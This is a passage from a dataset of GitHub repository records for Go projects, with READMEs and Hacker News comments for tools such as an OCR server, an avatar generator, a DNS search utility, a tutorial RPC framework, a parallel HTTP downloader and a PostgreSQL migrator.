8080:8080 otiai10/ocrserver\n# open http://localhost:8080\n```\n\ncf. 
[docker](https://www.docker.com/products/docker-toolbox)\n\n## Development with Docker Image\n\n```sh\n% docker-compose up\n# open http://localhost:8080\n```\n\nYou need more languages?\n\n```sh\n% docker-compose build --build-arg LOAD_LANG=rus\n% docker-compose up\n```\n\ncf. [docker-compose](https://www.docker.com/products/docker-toolbox)\n\n## Manual Setup\n\nIf you have tesseract-ocr and library files on your machine\n\n```sh\n% go get github.com/otiai10/ocrserver/...\n% PORT=8080 ocrserver\n# open http://localhost:8080\n```\n\ncf. [gosseract](https://github.com/otiai10/gosseract)\n\n# Documents\n\n- [API Endpoints](https://github.com/otiai10/ocrserver/wiki/API-Endpoints)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "o1egl/govatar", "link": "https://github.com/o1egl/govatar", "tags": ["skin", "avatar-generator", "go", "golang"], "stars": 548, "description": "Avatar generation library for GO language", "lang": "Go", "repo_lang": "", "readme": "# GOvatar\n[![License](http://img.shields.io/:license-mit-blue.svg)](LICENSE)\n[![GoDoc](https://godoc.org/github.com/o1egl/govatar?status.svg)](https://godoc.org/github.com/o1egl/govatar)\n[![Build](https://github.com/o1egl/govatar/actions/workflows/main.yaml/badge.svg)](https://github.com/o1egl/govatar/actions/workflows/main.yaml)\n[![Coverage](https://codecov.io/gh/o1egl/govatar/branch/master/graph/badge.svg)](https://codecov.io/gh/o1egl/govatar)\n[![Go Report Card](https://goreportcard.com/badge/github.com/o1egl/govatar)](https://goreportcard.com/report/github.com/o1egl/govatar)\n\n![GOvatar image](files/avatars.jpg)\n\nGOvatar is an avatar generation library written in GO\n\n---\n\n#### Notes\n1. From release v0.4.0 onward, the minimal supported golang version is 1.16.\n\n---\n\n## Install\n\n### Brew\n\n```\n$ brew tap o1egl/tap\n$ brew install govatar\n```\n\n### Docker\n\n```\n$ docker pull o1egl/govatar\n```\n\n### From source\n\n```\n$ go get -u github.com/o1egl/govatar/...\n```\n\nPrebuilt [binary packages](https://github.com/o1egl/govatar/releases) are available for Mac, Linux, and Windows.\n\n## Usage\n\n```bash\n$ govatar generate male -o avatar.png # Generates random avatar.png for male\n$ govatar generate female -o avatar.png # Generates random avatar.png for female\n$ govatar generate male -u username@site.com -o avatar.png # Generates avatar.png for specified username\n$ govatar -h # Display help message\n```\n\n#### As lib\n\nGenerates avatar and save it to filePath\n\n```go\nerr := govatar.GenerateFile(govatar.MALE, \"/path/to/avatar.jpg\")\nerr := govatar.GenerateFileForUsername(govatar.MALE, \"username\", \"/path/to/avatar.jpg\")\n````\n\nGenerates an avatar and returns it as an image.Image\n\n```go\nimg, err := govatar.Generate(govatar.MALE)\nimg, err := govatar.GenerateForUsername(govatar.MALE, \"username\")\n````\n\n\n## Copyright, License & Contributors\n\n### Adding new skins\n\n1. Add new skins to the background, male/clothes, female/hair, etc...\n2. Submit pull request :)\n\n### Submitting a Pull Request\n\n1. Fork it.\n2. Create a branch (`git checkout -b my_branch`)\n3. Commit your changes (`git commit -am \"Added new awesome avatars\"`)\n4. Push to the branch (`git push origin my_branch`)\n5. Open a [Pull Request](https://github.com/o1egl/govatar/pulls)\n6. Enjoy a refreshing Diet Coke and wait\n\nGOvatar is released under the MIT license. 
See [LICENSE](LICENSE)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "erbbysam/DNSGrep", "link": "https://github.com/erbbysam/DNSGrep", "tags": [], "stars": 548, "description": "Quickly Search Large DNS Datasets", "lang": "Go", "repo_lang": "", "readme": "# DNSGrep\nA utility for quickly searching presorted DNS names. Built around the Rapid7 rdns & fdns dataset.\n\n# How does it work?\n\nThis utility assumes the file provided is presorted (both alphabetical, and symbols).\n\nThe algorithm is pretty simple:\n1) Use a binary search algorithm to seek through the file, looking for a substring match against the query.\n2) Once a match is found, the file is scanned backwards in 10KB increments looking for a non-matching substring.\n3) Once a non-matching substring is found, the file is scanned forwards until all exact matches are returned.\n\n# Limits\n\nThere is a built-in limit system. This prevents 2 things:\n1) scanning too far backwards (`MaxScan`)\n2) scanning too far forwards after scanning backwards (`MaxOutputLines`)\n\nThis allows for any input while stopping requests that are taking too long.\n\nAdditionally, this utility does not handle the edge cases(start/end) of files and will return an error if encountered.\n\n# Install\n\n`go get` the following packages:\n\n```\n# used for dnsgrep cli flags\ngo get \"github.com/jessevdk/go-flags\"\n# used by the experimental server for http routing\ngo get \"github.com/gorilla/mux\"\n# pull in a string reversal function\ngo get \"github.com/golang/example/stringutil\"\n\n```\n\n# Run\n\nThe following steps were tested with Ubuntu 16.04 & go 1.11.5.\n\nGenerate fdns_a.sort.txt and rdns.sort.txt first using the scripts found in the scripts/ folder:\n```\n# Each of these scripts requires:\n# * 3 hours+ on an SSD\n# * 300GB+ temp disk space (under the same folder)\n# * ~65GB for output output (under the same folder)\n# * jq to be installed\n./scripts/fdns_a.sh\n./scripts/rdns.sh\n```\n\n\nRun the command line utility:\n```\ngo run dnsgrep.go -f DNSBinarySearch/test_data.txt -i \"amiccom.com.tw\"\n```\n\nRun the experimental server in the same folder as fdns_a.sort & rdns.sort.txt:\n```\ngo run experimentalServer.go\n```\n\n# Docker \n\nYou can also run the command line utility using Docker:\n```\ndocker build -t dnsgrep .\ndocker run --rm -it -v \"$PWD\"/DNSBinarySearch:/files dnsgrep -f /files/test_data.txt -i \".amiccom.com.tw\"\n```\n\n# Data Source\nThe source of this data referenced throughout this repository is Rapid7 Labs. 
Please review the Terms of Service:\nhttps://opendata.rapid7.com/about/\n\nhttps://opendata.rapid7.com/sonar.rdns_v2/\n\nhttps://opendata.rapid7.com/sonar.fdns_v2/\n\n# Stack Overflow References\n\nvia https://unix.stackexchange.com/a/35472\n* we need to sort with LC_COLLATE=C to also sort ., chars\n\nvia https://unix.stackexchange.com/a/350068\n * To sort a large file: split it into chunks, sort the chunks and then simply merge the results\n\n\n\n# License\n\nSee LICENSE file.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ankur-anand/simple-go-rpc", "link": "https://github.com/ankur-anand/simple-go-rpc", "tags": ["go", "golang", "rpc-framework", "rpc"], "stars": 548, "description": "RPC explained by writing simple RPC framework in 300 lines of pure Golang.", "lang": "Go", "repo_lang": "", "readme": "## Simple GoRPC\n\nLearning RPC basic building blocks by building a simple RPC framework in Golang from scratch.\n\n## RPC\n\nIn Simple Term **Service A** wants to call **Service B** functions. But those two services are not in the same memory space. So it cannot be called directly.\n\nSo, in order to make this call happen, we need to express the semantics of how to call and also how to pass the communication through the network.\n\n### Let's think what we do when we call function in the same memory space (local call)\n\n```go\ntype User struct {\n\tName string\n\tAge int\n}\n\nvar userDB = map[int]User{\n\t1: User{\"Ankur\", 85},\n\t9: User{\"Anand\", 25},\n\t8: User{\"Ankur Anand\", 27},\n}\n\n\nfunc QueryUser(id int) (User, error) {\n\tif u, ok := userDB[id]; ok {\n\t\treturn u, nil\n\t}\n\n\treturn User{}, fmt.Errorf(\"id %d not in user db\", id)\n}\n\n\nfunc main() {\n\tu , err := QueryUser(8)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t\treturn\n\t}\n\n\tfmt.Printf(\"name: %s, age: %d \\n\", u.Name, u.Age)\n}\n```\n\nNow, how do we do the same function call over the network?\n\n**Client** will call _QueryUser(id int)_ function over the network and there will be one server which will Serve the Call to this function and return the Response _User{\"Name\", id}, nil_.\n\n## Network Transmission Data format.\n\nSimple-gorpc will do TLV (fixed-length header + variable-length message body) encoding scheme to regulate the transmission of data, over the tcp.\n**More on this later**\n\n### Before we send our data over the network we need to define the structure how we are going to send the data over the network.\n\nThis helps us to define a common protocol that, the client and server both can understand. 
(a protobuf IDL defines what both server and client understand).\n\n### So data received by the server needs to have:\n\n- the name of the function to be called\n- the list of parameters to be passed to that function\n\nAlso, let's agree that the second return value is of type error, indicating the RPC call result.\n\n```go\n// RPCdata transmission format\ntype RPCdata struct {\n\tName string // name of the function\n\tArgs []interface{} // request's or response's body, except the error\n\tErr string // error from executing on the remote server\n}\n```\n\nSo now that we have a format, we need to serialize it so that we can send it over the network.\nIn our case we will use Go's default binary serialization protocol (gob) for encoding and decoding.\n\n```go\n// Encode the RPCdata into binary form so it can be sent over the network.\nfunc Encode(data RPCdata) ([]byte, error) {\n\tvar buf bytes.Buffer\n\tencoder := gob.NewEncoder(&buf)\n\tif err := encoder.Encode(data); err != nil {\n\t\treturn nil, err\n\t}\n\treturn buf.Bytes(), nil\n}\n\n// Decode the binary data into the Go struct\nfunc Decode(b []byte) (RPCdata, error) {\n\tbuf := bytes.NewBuffer(b)\n\tdecoder := gob.NewDecoder(buf)\n\tvar data RPCdata\n\tif err := decoder.Decode(&data); err != nil {\n\t\treturn RPCdata{}, err\n\t}\n\treturn data, nil\n}\n```\n\n### Network Transmission\n\nThe TLV protocol was chosen because it is very simple to implement, and it also fulfills our need to know the length of the data to read, i.e. how many bytes to read for this request from the incoming stream. `Send` and `Read` below do exactly that.\n\n```go\n// Transport will use TLV protocol\ntype Transport struct {\n\tconn net.Conn // Conn is a generic stream-oriented network connection.\n}\n\n// NewTransport creates a Transport\nfunc NewTransport(conn net.Conn) *Transport {\n\treturn &Transport{conn}\n}\n\n// Send TLV data over the network\nfunc (t *Transport) Send(data []byte) error {\n\t// we need 4 more bytes than the length of data,\n\t// as the TLV header is 4 bytes and in this header\n\t// we encode how many bytes of data\n\t// we are sending for this request.\n\tbuf := make([]byte, 4+len(data))\n\tbinary.BigEndian.PutUint32(buf[:4], uint32(len(data)))\n\tcopy(buf[4:], data)\n\t_, err := t.conn.Write(buf)\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}\n\n// Read TLV sent over the wire\nfunc (t *Transport) Read() ([]byte, error) {\n\theader := make([]byte, 4)\n\t_, err := io.ReadFull(t.conn, header)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdataLen := binary.BigEndian.Uint32(header)\n\tdata := make([]byte, dataLen)\n\t_, err = io.ReadFull(t.conn, data)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn data, nil\n}\n```\n\nNow that we have the data format and transport protocol defined, we need an **RPC Server** and an **RPC Client**.\n\n## RPC SERVER\n\nThe RPC server will receive the `RPCdata`, which carries the function name.\n**So we need to maintain a map from function name to the actual function.**\n\n```go\n// RPCServer ...\ntype RPCServer struct {\n\taddr string\n\tfuncs map[string]reflect.Value\n}\n\n// Register the name of the function and its entries\nfunc (s *RPCServer) Register(fnName string, fFunc interface{}) {\n\tif _, ok := s.funcs[fnName]; ok {\n\t\treturn\n\t}\n\n\ts.funcs[fnName] = reflect.ValueOf(fFunc)\n}\n```\n\nNow that we have the functions registered, when we receive a request we will check whether the requested function name is registered, 
and then will execute it accordingly\n\n```go\n// Execute the given function if present\nfunc (s *RPCServer) Execute(req RPCdata) RPCdata {\n\t// get method by name\n\tf, ok := s.funcs[req.Name]\n\tif !ok {\n\t\t// since method is not present\n\t\te := fmt.Sprintf(\"func %s not Registered\", req.Name)\n\t\tlog.Println(e)\n\t\treturn RPCdata{Name: req.Name, Args: nil, Err: e}\n\t}\n\n\tlog.Printf(\"func %s is called\\n\", req.Name)\n\t// unpackage request arguments\n\tinArgs := make([]reflect.Value, len(req.Args))\n\tfor i := range req.Args {\n\t\tinArgs[i] = reflect.ValueOf(req.Args[i])\n\t}\n\n\t// invoke requested method\n\tout := f.Call(inArgs)\n\t// now since we have followed the function signature style where last argument will be an error\n\t// so we will pack the response arguments expect error.\n\tresArgs := make([]interface{}, len(out) - 1)\n\tfor i := 0; i < len(out) - 1; i ++ {\n\t\t// Interface returns the constant value stored in v as an interface{}.\n\t\tresArgs[i] = out[i].Interface()\n\t}\n\n\t// pack error argument\n\tvar er string\n\tif e, ok := out[len(out) - 1].Interface().(error); ok {\n\t\t// convert the error into error string value\n\t\ter = e.Error()\n\t}\n\treturn RPCdata{Name: req.Name, Args: resArgs, Err: er}\n}\n```\n\n## RPC CLIENT\n\nSince the concrete implementation of the function is on the server side, the client only has the prototype of the function, so we need complete prototype of the calling function, so that we can call it.\n\n```go\nfunc (c *Client) callRPC(rpcName string, fPtr interface{}) {\n\tcontainer := reflect.ValueOf(fPtr).Elem()\n\tf := func(req []reflect.Value) []reflect.Value {\n\t\tcReqTransport := NewTransport(c.conn)\n\t\terrorHandler := func(err error) []reflect.Value {\n\t\t\toutArgs := make([]reflect.Value, container.Type().NumOut())\n\t\t\tfor i := 0; i < len(outArgs)-1; i++ {\n\t\t\t\toutArgs[i] = reflect.Zero(container.Type().Out(i))\n\t\t\t}\n\t\t\toutArgs[len(outArgs)-1] = reflect.ValueOf(&err).Elem()\n\t\t\treturn outArgs\n\t\t}\n\n\t\t// Process input parameters\n\t\tinArgs := make([]interface{}, 0, len(req))\n\t\tfor _, arg := range req {\n\t\t\tinArgs = append(inArgs, arg.Interface())\n\t\t}\n\n\t\t// ReqRPC\n\t\treqRPC := RPCdata{Name: rpcName, Args: inArgs}\n\t\tb, err := Encode(reqRPC)\n\t\tif err != nil {\n\t\t\tpanic(err)\n\t\t}\n\t\terr = cReqTransport.Send(b)\n\t\tif err != nil {\n\t\t\treturn errorHandler(err)\n\t\t}\n\t\t// receive response from server\n\t\trsp, err := cReqTransport.Read()\n\t\tif err != nil { // local network error or decode error\n\t\t\treturn errorHandler(err)\n\t\t}\n\t\trspDecode, _ := Decode(rsp)\n\t\tif rspDecode.Err != \"\" { // remote server error\n\t\t\treturn errorHandler(errors.New(rspDecode.Err))\n\t\t}\n\n\t\tif len(rspDecode.Args) == 0 {\n\t\t\trspDecode.Args = make([]interface{}, container.Type().NumOut())\n\t\t}\n\t\t// unpackage response arguments\n\t\tnumOut := container.Type().NumOut()\n\t\toutArgs := make([]reflect.Value, numOut)\n\t\tfor i := 0; i < numOut; i++ {\n\t\t\tif i != numOut-1 { // unpackage arguments (except error)\n\t\t\t\tif rspDecode.Args[i] == nil { // if argument is nil (gob will ignore \"Zero\" in transmission), set \"Zero\" value\n\t\t\t\t\toutArgs[i] = reflect.Zero(container.Type().Out(i))\n\t\t\t\t} else {\n\t\t\t\t\toutArgs[i] = reflect.ValueOf(rspDecode.Args[i])\n\t\t\t\t}\n\t\t\t} else { // unpackage error argument\n\t\t\t\toutArgs[i] = reflect.Zero(container.Type().Out(i))\n\t\t\t}\n\t\t}\n\n\t\treturn 
outArgs\n\t}\n\tcontainer.Set(reflect.MakeFunc(container.Type(), f))\n}\n```\n\n### Testing our framework\n\n```go\npackage main\n\nimport (\n\t\"encoding/gob\"\n\t\"fmt\"\n\t\"net\"\n)\n\ntype User struct {\n\tName string\n\tAge int\n}\n\nvar userDB = map[int]User{\n\t1: User{\"Ankur\", 85},\n\t9: User{\"Anand\", 25},\n\t8: User{\"Ankur Anand\", 27},\n}\n\nfunc QueryUser(id int) (User, error) {\n\tif u, ok := userDB[id]; ok {\n\t\treturn u, nil\n\t}\n\n\treturn User{}, fmt.Errorf(\"id %d not in user db\", id)\n}\n\nfunc main() {\n\t// new Type needs to be registered\n\tgob.Register(User{})\n\taddr := \"localhost:3212\"\n\tsrv := NewServer(addr)\n\n\t// start server\n\tsrv.Register(\"QueryUser\", QueryUser)\n\tgo srv.Run()\n\n\t// wait for server to start.\n\ttime.Sleep(1 * time.Second)\n\n\t// start client\n\tconn, err := net.Dial(\"tcp\", addr)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tcli := NewClient(conn)\n\n\tvar Query func(int) (User, error)\n\tcli.callRPC(\"QueryUser\", &Query)\n\n\tu, err := Query(1)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(u)\n\n\tu2, err := Query(8)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tfmt.Println(u2)\n}\n```\n\nOutput\n\n```\n2019/07/23 20:26:18 func QueryUser is called\n{Ankur 85}\n2019/07/23 20:26:18 func QueryUser is called\n{Ankur Anand 27}\n```\n\n`go run main.go`\n", "readme_type": "markdown", "hn_comments": "Worth it to learn gRPC first or start with std lib RPC?For a good RPC abstraction, I think a key requirement is to easily and safely change the deployment separation between modules that use the abstraction \u2013 deployment separations being: in-proc, inter-process-communication and remote-procedure-call.That is,1. deploy the modules within the same process then the method invocation is most efficient;2. deploy the module across separate OS processes on the same machine then the method invocation is via the best available OS IPC mechanism;3. deploy the module across separate machines then the method invocation is over network with most efficient remote procedure call implementation.A long time ago I worked on a project that used Corba (with ACE TAO) that had facilities like this and it made development, testing environments vs various production environment permutations a lot easier to build for and manage over multiple product lifecycles. Now-a-days, these Microservices frameworks are missing these (basic) features and it overly complicates the deployment scenarios.Rather than hand-rolling 300 line custom RPC mechanisms like this one, I would rather prefer a more complete one that did solve the above problems.I haven't studied this extensively but it looks like a great bit of sample code for someone who wants to see how to do some networking in Go. I echo the other comments that find the use of a custom transport interesting, since writing a transport is one of those things that I've always been glad I haven't had to learn how to do, especially since I'm usually just using HTTP for which Go is very much batteries-included.This whole thing raises the question though, is this hard to do in other languages?This is great, I'm very new to Go and new to RPCs. I went through the code and had a question someone might be able to answer as I'm still learning Go.The Server package contains the Register function. Main package implements the QueryUser function that does the work of querying the DB. When Main calls Server.Register to register the function with Server, it sends the function name (QueryUser) and..something else? 
Is that the memory address of QueryUser on my computer? And when Server actually runs the function, it's just pointing to QueryUser at the memory address given to it by Main?If that's the case, am I correct in thinking that this wouldn't work as written if the Server package were running on a different physical server, because it obviously wouldn't be able to access the memory location of QueryUser on a different machine. So in this case, the Server would need to implement QueryUser itself on its hardware, but otherwise would work.Or maybe the use case of RPCs isn't for two servers communicating, but rather for two different programs on the same machine only? Or maybe what Server.Register receives is the actual function, not just the memory location (though I see no evidence of this).Can someone help enlighten me?The use of a custom transport is interesting... one of the reasons I love Go's RPC package is because it Just Works(tm) with TLS, TCP, etc etc out of the box. For anyone just showing up to this: you do not _have_ to create a custom transport.Related: Scott Mansfield of Netflix gave a talk at Gophercon 2017 on their custom serialization format if these things are interesting to you... https://github.com/gophercon/2017-talks/blob/master/ScottMan...Nice example of using \"gob\" to create RPC services. But why call it a \"framework\"?", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "htcat/htcat", "link": "https://github.com/htcat/htcat", "tags": [], "stars": 548, "description": "Parallel and Pipelined HTTP GET Utility", "lang": "Go", "repo_lang": "", "readme": "# htcat #\n\n`htcat` is a utility to perform parallel, pipelined execution of a\nsingle HTTP `GET`. `htcat` is intended for the purpose of\nincantations like:\n\n htcat https://host.net/file.tar.gz | tar -zx\n\nIt is tuned (and only really useful) for faster interconnects:\n\n $ htcat http://test.com/file | pv -a > /dev/null\n [ 109MB/s]\n\nThis is on a gigabit network, between an AWS EC2 instance and S3.\nThis represents 91% use of the theoretical maximum of gigabit (119.2\nMiB/s).\n\n## Installation ##\n\nThis program depends on Go 1.1 or later. One can use `go get` to\ndownload and compile it from source:\n\n $ go get github.com/htcat/htcat/cmd/htcat\n\n## Help and Reporting Bugs ##\n\nFor correspondence of all sorts, write to .\nBugs can be filed at\n[htcat's GitHub Issues page](https://github.com/htcat/htcat/issues).\n\n## Approach ##\n\n`htcat` works by determining the size of the `Content-Length` of the\nURL passed, and then partitioning the work into a series of `GET`s\nthat use the `Range` header in the request, with the notable exception\nof the first issued `GET`, which has no `Range` header and is used to\nboth start the transfer and attempt to determine the size of the URL.\n\nUnlike most programs that do similar `Range`-based splitting, the\nrequests that are performed in parallel are limited to some bytes\nahead of the data emitted so far instead of splitting the entire byte\nstream evenly. 
The purpose of this is to emit those bytes as soon as\nreasonably possible, so that pipelined execution of another tool can,\ntoo, proceed in parallel.\n\nThese requests may complete slightly out of order, and are held in\nreserve until contiguous bytes can be emitted by a defragmentation\nroutine, that catenates together the complete, consecutive payloads in\nmemory for emission.\n\nTweaking the number of simultaneous transfers and the size of each\n`GET` makes a trade-off between latency to fill the output pipeline,\nmemory usage, and churn in requests and connections and incurring\ntheir associated start-up costs.\n\nIf `htcat`'s peer on the server side processes `Range` requests more\nslowly than regular `GET` without a `Range` header, then, `htcat`'s\nperformance can suffer relative to a simpler, single-stream `GET`.\n\n## Numbers ##\n\nThese are measurements falling well short of real benchmarks that are\nintended to give a rough sense of the performance improvements that\nmay be useful to you. These were taken via an AWS EC2 instance\nconnecting to S3, and there is definitely some variation in runs,\nsometimes very significant, especially at the higher speeds.\n\n|Tool | TLS | Rate |\n|-----------|-----|----------|\n|htcat | no | 109 MB/s |\n|curl | no | 36 MB/s |\n|aria2c -x5 | no | 113 MB/s |\n|htcat | yes | 59 MB/s |\n|curl | yes | 5 MB/s |\n|aria2c -x5 | yes | 17 MB/s |\n\nOn somewhat small files, the situation changes: `htcat` chooses\nsmaller parts, as to still get some parallelism.\n\nBelow are results while performing a 13MB transfer from S3 (Seattle)\nto an EC2 instance in Virginia. Notably, TLS being on or off did not\nseem to matter, perhaps in this case it was not a bottleneck.\n\n| Tool | Time |\n|--------|----------|\n| curl | 5.20s |\n| curl | 7.75s |\n| curl | 6.36s |\n| htcat | 2.69s |\n| htcat | 2.50s |\n| htcat | 3.25s |\n\nResults while performing a transfer of the same 13MB file from S3 to\nEC2, but all within Virginia:\n\n| Tool | TLS | Time |\n|------------|-----|----------|\n| curl | no | 0.29s |\n| curl | no | 0.75s |\n| curl | no | 0.44s |\n| htcat | no | 0.30s |\n| htcat | no | 0.30s |\n| htcat | no | 0.48s |\n| curl | yes | 2.69s |\n| curl | yes | 2.69s |\n| curl | yes | 2.62s |\n| htcat | yes | 1.37s |\n| htcat | yes | 0.45s |\n| htcat | yes | 0.59s |\n\nResults while performing a 4.6MB transfer on a fast (same-region)\nlink. This file is small enough that `htcat` disables multi-request\nparallelism. Given that, it's unclear why `htcat` performs markedly\nbetter on the TLS tests than `curl`.\n\n| Tool | TLS | Time |\n|------------|-----|----------|\n| curl | no | 0.14s |\n| curl | no | 0.13s |\n| curl | no | 0.14s |\n| htcat | no | 0.23s |\n| htcat | no | 0.16s |\n| htcat | no | 0.17s |\n| curl | yes | 0.95s |\n| curl | yes | 0.97s |\n| curl | yes | 0.99s |\n| htcat | yes | 0.38s |\n| htcat | yes | 0.34s |\n| htcat | yes | 0.24s |\n", "readme_type": "markdown", "hn_comments": "How can we build a machine vision robot easily? Do you share the tutorial or guideline for beginners?I think the Livera Robot kit is affordable, I will try to back one.The \"thehackernews.com\" domain is a spam site. 
If you have \"show dead\" enabled in your HN user profile, you can see that just about everything submitted to HN from that domain is '[dead]'.https://news.ycombinator.com/from?site=thehackernews.comAlso see cpo.st/1H5EOOx for the science behind it", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jackc/tern", "link": "https://github.com/jackc/tern", "tags": [], "stars": 548, "description": "The SQL Fan's Migrator", "lang": "Go", "repo_lang": "", "readme": "# Tern - The SQL Fan's Migrator\n\nTern is a standalone migration tool for PostgreSQL. It includes traditional migrations as well as a separate optional\nworkflow for managing database code such as functions and views.\n\n## Features\n\n* Multi-platform\n* Stand-alone binary\n* SSH tunnel support built-in\n* Data variable interpolation into migrations\n\n## Installation\n\nGo versions up to and including 1.17:\n\n go get -u github.com/jackc/tern\n\nGo versions 1.17 and higher:\n\n go install github.com/jackc/tern@latest\n\n## Creating a Tern Project\n\nTo create a new tern project in the current directory run:\n\n tern init\n\nOr to create the project somewhere else:\n\n tern init path/to/project\n\nTern projects are composed of a directory of migrations and optionally a\nconfig file. See the sample directory for an example.\n\n# Configuration\n\nDatabase connection settings can be specified via the standard PostgreSQL\nenvironment variables, via program arguments, or in a config file. By\ndefault tern will look in the current directory for the config file tern.conf\nand the migrations.\n\nThe `tern.conf` file is stored in the `ini` format with two sections,\n`database` and `data`. The `database` section contains settings for connection\nto the database server.\n\nValues in the `data` section will be available for interpolation into\nmigrations. This can help in scenarios where migrations are managing\npermissions and the user to which permissions are granted should be\nconfigurable.\n\nIf all database settings are supplied by PG* environment variables or program\narguments the config file is not required. In particular, using the `PGSERVICE`\ncan reduce or eliminate the need for a configuration file.\n\nThe entire `tern.conf` file is processed through the Go standard\n`text/template` package. [Sprig](http://masterminds.github.io/sprig/) functions\nare available.\n\nExample `tern.conf`:\n\n```ini\n[database]\n# host supports TCP addresses and Unix domain sockets\n# host = /private/tmp\nhost = 127.0.0.1\n# port = 5432\ndatabase = tern_test\nuser = jack\npassword = {{env \"MIGRATOR_PASSWORD\"}}\n# version_table = public.schema_version\n#\n# sslmode generally matches the behavior described in:\n# http://www.postgresql.org/docs/9.4/static/libpq-ssl.html#LIBPQ-SSL-PROTECTION\n#\n# There are only two modes that most users should use:\n# prefer - on trusted networks where security is not required\n# verify-full - require SSL connection\n# sslmode = prefer\n#\n# \"conn_string\" accepts two formats; URI or DSN as described in:\n# https://www.postgresql.org/docs/current/libpq-connect.html#LIBPQ-CONNSTRING\n#\n# This property is lenient i.e., it does not throw error\n# if values for both \"conn_string\" and \"host/port/..\" are\n# provided. 
In this case, the individual properties will\n# override the correspoding part in the \"conn_string\".\n#\n# URI format:\n# conn_string = postgresql://other@localhost/otherdb?connect_timeout=10&application_name=myapp\n# DSN format:\n# conn_string = host=localhost port=5432 dbname=mydb connect_timeout=10\n\n# Proxy the above database connection via SSH\n# [ssh-tunnel]\n# host =\n# port = 22\n# user defaults to OS user\n# user =\n# password is not required if using SSH agent authentication\n# password =\n\n[data]\nprefix = foo\napp_user = joe\n\n```\n\nThis flexibility configuration style allows handling multiple environments such\nas test, development, and production in several ways.\n\n* Separate config file for each environment\n* Environment variables for database settings and optionally one config file\n for shared settings\n* Program arguments for database settings and optionally one config file for\n shared settings\n\n## Migrations\n\nTo create a new migration:\n\n tern new name_of_migration\n\nThis will create a migration file with the given name prefixed by the next available sequence number (e.g. 001, 002, 003).\n\nThe migrations themselves have an extremely simple file format. They are\nsimply the up and down SQL statements divided by a magic comment.\n\n ---- create above / drop below ----\n\nExample:\n\n```sql\ncreate table t1(\n id serial primary key\n);\n\n---- create above / drop below ----\n\ndrop table t1;\n```\n\nIf a migration is irreversible such as a drop table, simply delete the magic\ncomment.\n\n```sql\ndrop table widgets;\n```\n\nTo interpolate a custom data value from the config file prefix the name with a\ndot and surround the whole with double curly braces.\n\n```sql\ncreate table {{.prefix}}config(\n id serial primary key\n);\n```\n\nMigrations are read from files in the migration directory in the order of the\nnumerical prefix. Each migration is run in a transaction.\n\nAny SQL files in subdirectories of the migration directory, will be available\nfor inclusion with the template command. This can be especially useful for\ndefinitions of views and functions that may have to be dropped and recreated\nwhen the underlying table(s) change.\n\n```sql\n// Include the file shared/v1_001.sql. Note the trailing dot.\n// It is necessary if the shared file needs access to custom data values.\n{{ template \"shared/v1_001.sql\" . }}\n);\n```\n\nTern uses the standard Go\n[text/template](http://golang.org/pkg/text/template/) package so conditionals\nand other advanced templating features are available if needed. See the\npackage docs for details. [Sprig](http://masterminds.github.io/sprig/)\nfunctions are also available.\n\n## Migrating\n\nTo migrate up to the last version using migrations and config file located in\nthe same directory simply run tern:\n\n tern migrate\n\nTo migrate up or down to a specific version:\n\n tern migrate --destination 42\n\nTo migrate up N versions:\n\n tern migrate --destination +3\n\nTo migrate down N versions:\n\n tern migrate --destination -3\n\nTo migrate down and rerun the previous N versions:\n\n tern migrate --destination -+3\n\nTo use a different config file:\n\n tern migrate --config path/to/tern.json\n\nTo use a different migrations directory:\n\n tern migrate --migrations path/to/migrations\n\n## Renumbering Conflicting Migrations\n\nWhen migrations are created on multiple branches the migrations need to be renumbered when the branches are merged. The\n`tern renumber` command can automatically do this. 
On the branch with the only migrations to keep at the lower numbers\nrun `tern renumber start`. Merge the branches. Then run `tern renumber finish`.\n\n```\n$ git switch master\nSwitched to branch 'master'\n$ ls\n001_create_users.sql\n002_add_last_login_to_users.sql\n\n$ git switch feature\nSwitched to branch 'feature'\n$ ls\n001_create_users.sql\n002_create_todos.sql\n\n# Both branches have a migration number 2.\n\n# Run tern renumber start on the branch with the migrations that should come first.\n\n$ git switch master\nSwitched to branch 'master'\n$ tern renumber start\n\n# Then go to the branch with migrations that should come later and merge or rebase.\n\n$ git switch feature\n$ git rebase master\nSuccessfully rebased and updated refs/heads/feature.\n$ ls\n001_create_users.sql\n002_add_last_login_to_users.sql\n002_create_todos.sql\n\n# There are now two migrations with the same migration number.\n\n$ tern renumber finish\n$ ls\n001_create_users.sql\n002_add_last_login_to_users.sql\n003_create_todos.sql\n\n# The migrations are now renumbered in the correct order.\n```\n\n## Code Packages\n\nThe migration paradigm works well for creating and altering tables, but it can be unwieldy when dealing with database\ncode such as server side functions and views. For example, consider a schema where view `c` depends on view `b` which\ndepends on view `a`. A change to `a` may require the following steps:\n\n1. Drop `c`\n2. Drop `b`\n3. Drop `a`\n4. Create `a`\n5. Create `b`\n6. Create `c`\n\nIn addition to the challenge of manually building such a migration it is difficult to use version control to see the\nchanges in a particular database object over time when its definition is scattered through multiple migrations.\n\nA solution to this is code packages. A code package is a directory with an `install.sql` file that contains the\ninstructions to completely drop and recreate a set of database code. The command `code install` can be used to directly\ninstall a code package (especially useful during development) and the `code snapshot` command can be used to make a\nsingle migration that installs that code package.\n\nFor example given a directory `code` containing the following files:\n\n```\n-- install.sql\ndrop schema if exists code cascade;\ncreate schema code;\n\n{{ template \"a.sql\" . }}\n{{ template \"b.sql\" . }}\n{{ template \"c.sql\" . }}\n```\n\n```\n-- a.sql\ncreate view code.a as select ...;\n```\n\n```\n-- b.sql\ncreate view code.b as select * from code.a where ...;\n```\n\n```\n-- c.sql\ncreate view code.c as select * from code.b where ...;\n```\n\nThen this command would install the package into the database.\n\n```\ntern code install path/to/code --config path/to/tern.conf\n```\n\nAnd this command would create a 